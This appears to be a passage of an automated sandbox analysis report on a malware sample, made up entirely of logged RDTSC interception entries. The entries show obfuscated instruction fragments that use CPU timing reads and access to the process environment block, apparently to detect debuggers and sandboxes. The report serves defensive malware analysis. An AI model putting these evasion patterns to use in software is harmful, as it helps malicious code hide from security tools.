Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C739 second address: 117C73D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117D188 second address: 117D192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117D192 second address: 117D196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1180148 second address: 1180150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1180150 second address: 1180156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BB3AF second address: 11BB3B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11C3221 second address: 11C324E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C689h 0x00000007 js 00007F930851C676h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F930851C67Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BD7A5 second address: 11BD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD92Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BD7B6 second address: 11BD7D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jng 00007F930851C676h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BD7D1 second address: 11BD7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD938h 0x00000009 jno 00007F9308CAD926h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF201 second address: 11CF207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF207 second address: 11CF20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF20D second address: 11CF235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F930851C685h 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F930851C676h 0x00000012 jnl 00007F930851C676h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF235 second address: 11CF251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jl 00007F9308CAD93Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF251 second address: 11CF255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF255 second address: 11CF259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF090 second address: 11CF094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF094 second address: 11CF0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9308CAD92Dh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF0B2 second address: 11CF0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF0BD second address: 11CF0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD930h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF0D1 second address: 11CF0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D0765 second address: 11D0769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D0769 second address: 11D0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C688h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F930851C67Fh 0x0000000f pop edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D3019 second address: 11D302F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD932h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D302F second address: 11D3033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D3033 second address: 11D3048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD92Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994AB second address: 12994AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994AF second address: 12994B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994B3 second address: 12994B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994B9 second address: 12994BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129831A second address: 1298340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F930851C676h 0x00000009 jmp 00007F930851C686h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298340 second address: 129834A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9308CAD926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298496 second address: 12984A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnp 00007F930851C676h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12987B9 second address: 12987BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12987BD second address: 12987D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F930851C67Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129891B second address: 1298920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298920 second address: 129892D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129892D second address: 1298933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298933 second address: 1298992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C686h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jnp 00007F930851C676h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push esi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d pop esi 0x0000001e pushad 0x0000001f jmp 00007F930851C684h 0x00000024 jmp 00007F930851C689h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129905E second address: 1299064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1299064 second address: 1299068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129BDD3 second address: 129BDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129BE40 second address: 129BE53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C67Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129BE53 second address: 129BE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C05A second address: 129C061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C42C second address: 129C438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C438 second address: 129C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F930851C676h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C445 second address: 129C4A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb dl, 00000053h 0x0000000b push dword ptr [ebp+122D3507h] 0x00000011 and edx, 6B7894B3h 0x00000017 call 00007F9308CAD929h 0x0000001c jp 00007F9308CAD930h 0x00000022 push eax 0x00000023 pushad 0x00000024 jnc 00007F9308CAD937h 0x0000002a jmp 00007F9308CAD92Eh 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C4A5 second address: 129C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F930851C680h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C4C2 second address: 129C4C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129C4C6 second address: 129C4F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F930851C680h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F930851C67Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129D835 second address: 129D845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 jl 00007F9308CAD93Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129D845 second address: 129D84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129D84B second address: 129D851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129F3D3 second address: 129F3DE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129EFDC second address: 129EFF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 jmp 00007F9308CAD92Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0008 second address: 75B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B000C second address: 75B0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0012 second address: 75B004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F930851C684h 0x00000009 adc cx, 8D28h 0x0000000e jmp 00007F930851C67Bh 0x00000013 popfd 0x00000014 mov dx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop ecx 0x00000020 mov bh, 06h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B004A second address: 75B007B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD935h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9308CAD933h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B007B second address: 75B0098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C689h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0098 second address: 75B00B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00B4 second address: 75B00B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00B8 second address: 75B00BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00BE second address: 75B00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C681h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00D3 second address: 75B00E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00E3 second address: 75B00F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C682h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B00F9 second address: 75B0125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9308CAD935h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0125 second address: 75B01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d mov si, 0FE3h 0x00000011 popad 0x00000012 xchg eax, ebx 0x00000013 jmp 00007F930851C682h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F930851C67Ch 0x00000022 or ecx, 58052358h 0x00000028 jmp 00007F930851C67Bh 0x0000002d popfd 0x0000002e pushfd 0x0000002f jmp 00007F930851C688h 0x00000034 adc ch, FFFFFFB8h 0x00000037 jmp 00007F930851C67Bh 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B01A2 second address: 75B01CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD939h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9308CAD92Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B01CF second address: 75B01FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C681h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c jmp 00007F930851C67Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 push eax 0x00000017 push edx 0x00000018 mov ebx, eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B01FE second address: 75B0228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9308CAD92Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0228 second address: 75B022E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B022E second address: 75B026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F9308CAD939h 0x0000000e mov esi, dword ptr [775606ECh] 0x00000014 jmp 00007F9308CAD92Eh 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B026C second address: 75B0270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0270 second address: 75B0276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0276 second address: 75B02FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F930851C680h 0x0000000b adc esi, 554E3328h 0x00000011 jmp 00007F930851C67Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007F930851D568h 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F930851C682h 0x00000027 pushfd 0x00000028 jmp 00007F930851C682h 0x0000002d adc cl, FFFFFFB8h 0x00000030 jmp 00007F930851C67Bh 0x00000035 popfd 0x00000036 popad 0x00000037 push ecx 0x00000038 pushad 0x00000039 popad 0x0000003a pop edx 0x0000003b popad 0x0000003c xchg eax, edi 0x0000003d jmp 00007F930851C680h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B02FB second address: 75B0301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0301 second address: 75B0308 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0308 second address: 75B0361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9308CAD936h 0x00000011 jmp 00007F9308CAD935h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007F9308CAD930h 0x0000001d and ch, 00000008h 0x00000020 jmp 00007F9308CAD92Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0361 second address: 75B0437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C689h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [77530B60h] 0x0000000f mov eax, 756AE5E0h 0x00000014 ret 0x00000015 jmp 00007F930851C67Eh 0x0000001a push 00000044h 0x0000001c jmp 00007F930851C680h 0x00000021 pop edi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F930851C67Eh 0x00000029 and ah, FFFFFFF8h 0x0000002c jmp 00007F930851C67Bh 0x00000031 popfd 0x00000032 call 00007F930851C688h 0x00000037 call 00007F930851C682h 0x0000003c pop eax 0x0000003d pop ebx 0x0000003e popad 0x0000003f xchg eax, edi 0x00000040 pushad 0x00000041 mov eax, 701915A3h 0x00000046 mov edx, ecx 0x00000048 popad 0x00000049 push eax 0x0000004a jmp 00007F930851C685h 0x0000004f xchg eax, edi 0x00000050 jmp 00007F930851C67Eh 0x00000055 push dword ptr [eax] 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a call 00007F930851C67Dh 0x0000005f pop ecx 0x00000060 movsx edx, si 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0437 second address: 75B0479 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD933h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F9308CAD932h 0x00000018 xor cl, FFFFFFD8h 0x0000001b jmp 00007F9308CAD92Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 75B0479 second address: 75B04EA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F930851C688h 0x00000008 sbb esi, 2F3E5D38h 0x0000000e jmp 00007F930851C67Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F930851C688h 0x0000001c jmp 00007F930851C685h 0x00000021 popfd 0x00000022 popad 0x00000023 push dword ptr [eax+18h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F930851C67Dh 0x0000002d rdtsc
